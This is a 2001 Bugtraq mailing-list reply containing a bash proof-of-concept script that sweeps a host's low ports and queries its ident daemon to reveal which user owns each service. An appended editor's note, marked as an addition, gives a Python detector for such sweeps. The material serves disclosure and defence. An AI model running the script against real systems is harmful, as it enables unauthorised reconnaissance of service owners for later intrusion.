[18459] in bugtraq


Re: analysis of auditable port scanning techniques

daemon@ATHENA.MIT.EDU (Rainer Weikusat)
Mon Jan 8 13:11:36 2001

MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <87ae95102g.fsf@winter.inter-i.uni-mainz.de>
Date:         Sat, 6 Jan 2001 10:50:31 +0100
Reply-To: Rainer Weikusat <weikusat@MAIL.UNI-MAINZ.DE>
From: Rainer Weikusat <weikusat@MAIL.UNI-MAINZ.DE>
X-To:         Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  Dan Harkless's message of "Thu, 4 Jan 2001 20:32:01 -0800"

Dan Harkless <dan-bugtraq@DILVISH.SPEED.NET> writes:
> > Using this grammar applied to the data we send to an arbitrary host piped
> > to the ident/auth port will reveal the process owner running on a given
> > port, even though we initiated the connection.
>
> Uh, no.  With properly-written ident daemons, such as pidentd,
-------------
#!/bin/bash
#

if [ "$1" != sub ];
then
    export HOST=$(host $1 | awk '{ print $3; }')
    declare -i I=1
    export PPPID=$$

    while [ $I -lt 1024 ];
    do
        (
            export I
            socket -r -p "$0 sub" $HOST $I 2>/dev/null
        )

        I=$(($I + 1))
    done
else
    LOCAL=$(netstat -n | grep ":.\+$HOST:$I.\+EST"|awk '{print $4;}'| cut -d: -f2)
    echo "$I,$LOCAL" | nc -w 1 $HOST auth >/proc/$PPPID/fd/1
    kill $PPID
fi
-------------

Just hacked up. Works wonderfully against pidentd 3.0.7-3 (Debian).

--
SIGSTOP
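Editor's note (added example, not part of the original post): the script above makes one ident query per target port, so on the identd host the technique shows up as a single remote address asking "server-port , client-port" for many distinct local ports in a short time. The following detector illustrates that from the defender's side. The log format it parses is a constructed stand-in (pidentd's real log lines look different), the sample lines are made up, and the threshold values are assumptions to be tuned per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in a hypothetical identd log format:
#   <iso-timestamp> identd: from <querier-ip> for <server-port>,<client-port> -> <reply>
# 192.0.2.10 queries six different local ports within a few seconds (a sweep);
# 198.51.100.7 asks for two ports forty minutes apart (ordinary ident use).
SAMPLE_LOG = """\
2001-01-06T10:50:31 identd: from 192.0.2.10 for 21,40001 -> USERID: UNIX: ftp
2001-01-06T10:50:31 identd: from 192.0.2.10 for 22,40002 -> USERID: UNIX: root
2001-01-06T10:50:32 identd: from 192.0.2.10 for 25,40003 -> USERID: UNIX: mail
2001-01-06T10:50:32 identd: from 192.0.2.10 for 53,40004 -> USERID: UNIX: named
2001-01-06T10:50:33 identd: from 192.0.2.10 for 80,40005 -> USERID: UNIX: www-data
2001-01-06T10:50:33 identd: from 192.0.2.10 for 110,40006 -> USERID: UNIX: root
2001-01-06T10:51:00 identd: from 198.51.100.7 for 25,51000 -> USERID: UNIX: mail
2001-01-06T11:30:00 identd: from 198.51.100.7 for 22,51001 -> USERID: UNIX: root
this line is garbage and must be ignored
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) identd: from (?P<src>\d+\.\d+\.\d+\.\d+) "
    r"for (?P<sport>\d+),(?P<cport>\d+) -> (?P<reply>.*)$"
)


def parse_line(line):
    """Parse one log line of the constructed format; return None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "src": m["src"],
        "server_port": int(m["sport"]),   # port on the identd host being asked about
        "client_port": int(m["cport"]),   # port on the querier's side
        "reply": m["reply"],
    }


def find_ident_sweeps(log_text, window=timedelta(seconds=60), min_ports=5):
    """Return {querier_ip: sorted distinct server ports} for every querier that asked
    about at least `min_ports` distinct local ports inside some `window`-long interval.
    Both thresholds are assumptions; tune them to the site's normal ident traffic."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None:
            by_src[rec["src"]].append(rec)

    flagged = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        # Sliding window over the time-sorted queries of this querier.
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            ports_in_window = {r["server_port"] for r in recs[start:end + 1]}
            if len(ports_in_window) >= min_ports:
                flagged[src] = sorted({r["server_port"] for r in recs})
                break
    return flagged


if __name__ == "__main__":
    for src, ports in find_ident_sweeps(SAMPLE_LOG).items():
        print(f"possible ident sweep from {src}: ports {ports}")
```

The window-based count is what distinguishes a sweep from legitimate ident use (mail and IRC servers typically ask about one port per connection). A querier that trips this check is also a reason to revisit whether the host needs to answer ident at all, or to run the daemon in a mode that does not return real user names.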
